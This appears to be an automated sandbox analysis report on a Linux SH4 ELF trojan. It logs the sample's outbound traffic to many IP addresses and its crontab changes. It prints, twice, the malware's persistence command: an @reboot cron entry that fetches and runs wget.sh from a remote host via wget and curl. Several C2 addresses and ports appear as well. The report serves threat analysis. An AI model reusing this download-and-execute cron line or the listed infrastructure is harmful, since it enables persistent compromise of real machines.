Source: nshsh4.elf |
ReversingLabs: Detection: 23% |
Source: tmp.L3xqaq.18.dr |
String: @reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh |
Source: global traffic |
TCP traffic: 195.133.92.51 ports 3,4,5,6,6435,6735 |
Source: global traffic |
TCP traffic: 193.233.193.45 ports 1,2,3,4,6,14623 |
Source: global traffic |
TCP traffic: 88.151.195.22 ports 7830,2,3,25385,5,8 |
Source: global traffic |
TCP traffic: 81.29.149.178 ports 15394,7362,1,3,4,5,9,6999,7869 |
Source: global traffic |
TCP traffic: 91.149.238.18 ports 13529,1,2,3,5,9 |
Source: global traffic |
TCP traffic: 192.168.2.23:33524 -> 88.151.195.22:25385 |
Source: global traffic |
TCP traffic: 192.168.2.23:53156 -> 91.149.218.232:17134 |
Source: global traffic |
TCP traffic: 192.168.2.23:40970 -> 195.133.92.51:6435 |
Source: global traffic |
TCP traffic: 192.168.2.23:46098 -> 81.29.149.178:15394 |
Source: global traffic |
TCP traffic: 192.168.2.23:36488 -> 185.82.200.181:6718 |
Source: global traffic |
TCP traffic: 192.168.2.23:49520 -> 91.149.238.18:13529 |
Source: global traffic |
TCP traffic: 192.168.2.23:55186 -> 31.13.248.89:22472 |
Source: global traffic |
TCP traffic: 192.168.2.23:42280 -> 193.233.193.45:14623 |
Source: /tmp/nshsh4.elf (PID: 6253) |
Socket: 127.0.0.1:1172 |
Jump to behavior |
Source: global traffic |
TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443 |
Source: global traffic |
TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443 |
Source: global traffic |
TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.189.91.42 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.189.91.43 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 109.202.202.202 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.189.91.42 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.189.91.43 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 109.202.202.202 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.189.91.42 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.189.91.43 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 70.34.254.19 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 70.34.254.19 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 70.34.254.19 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 70.34.254.19 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 139.84.165.176 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 139.84.165.176 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 51.158.108.203 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 51.158.108.203 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 139.84.165.176 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 5.161.109.23 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 217.160.70.42 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 217.160.70.42 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 152.53.15.127 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 185.181.61.24 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 217.160.70.42 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 64.176.6.48 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 194.36.144.87 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 139.84.165.176 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 139.84.165.176 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 152.53.15.127 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 64.176.6.48 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 152.53.15.127 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 152.53.15.127 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 185.181.61.24 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 5.161.109.23 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 202.61.197.122 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 80.152.203.134 |
Source: global traffic |
DNS traffic detected: DNS query: kingstonwikkerink.dyn |
Source: tmp.L3xqaq.18.dr |
String found in binary or memory: http://hailcocks.ru/wget.sh; |
Source: unknown |
Network traffic detected: HTTP traffic on port 43928 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 42836 -> 443 |
Source: ELF static info symbol of initial sample |
.symtab present: no |
Source: classification engine |
Classification label: mal60.troj.linELF@0/1@23/0 |
Source: /bin/sh (PID: 6259) |
Crontab executable: /usr/bin/crontab -> crontab -l |
Jump to behavior |
Source: /bin/sh (PID: 6258) |
Crontab executable: /usr/bin/crontab -> crontab - |
Jump to behavior |
Source: /usr/bin/crontab (PID: 6258) |
File: /var/spool/cron/crontabs/tmp.L3xqaq |
Jump to behavior |
Source: /usr/bin/crontab (PID: 6258) |
File: /var/spool/cron/crontabs/root |
Jump to behavior |
Source: /tmp/nshsh4.elf (PID: 6255) |
Shell command executed: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -" |
Jump to behavior |
Source: submitted sample |
Stderr: no crontab for root: exit code = 0 |
Source: /tmp/nshsh4.elf (PID: 6253) |
Queries kernel information via 'uname': |
Jump to behavior |
Source: nshsh4.elf, 6253.1.00007ffe0d65d000.00007ffe0d67e000.rw-.sdmp, nshsh4.elf, 6260.1.00007ffe0d65d000.00007ffe0d67e000.rw-.sdmp, nshsh4.elf, 6303.1.00007ffe0d65d000.00007ffe0d67e000.rw-.sdmp |
Binary or memory string: /usr/bin/qemu-sh4 |
Source: nshsh4.elf, 6253.1.000055aeb8234000.000055aeb82bc000.rw-.sdmp, nshsh4.elf, 6260.1.000055aeb8234000.000055aeb82bc000.rw-.sdmp, nshsh4.elf, 6303.1.000055aeb8234000.000055aeb82bc000.rw-.sdmp |
Binary or memory string: U5!/etc/qemu-binfmt/sh4 |
Source: nshsh4.elf, 6253.1.00007ffe0d65d000.00007ffe0d67e000.rw-.sdmp, nshsh4.elf, 6260.1.00007ffe0d65d000.00007ffe0d67e000.rw-.sdmp, nshsh4.elf, 6303.1.00007ffe0d65d000.00007ffe0d67e000.rw-.sdmp |
Binary or memory string: rx86_64/usr/bin/qemu-sh4/tmp/nshsh4.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/nshsh4.elf |
Source: nshsh4.elf, 6253.1.000055aeb8234000.000055aeb82bc000.rw-.sdmp, nshsh4.elf, 6260.1.000055aeb8234000.000055aeb82bc000.rw-.sdmp, nshsh4.elf, 6303.1.000055aeb8234000.000055aeb82bc000.rw-.sdmp |
Binary or memory string: /etc/qemu-binfmt/sh4 |
Source: nshsh4.elf, 6303.1.00007ffe0d65d000.00007ffe0d67e000.rw-.sdmp |
Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped |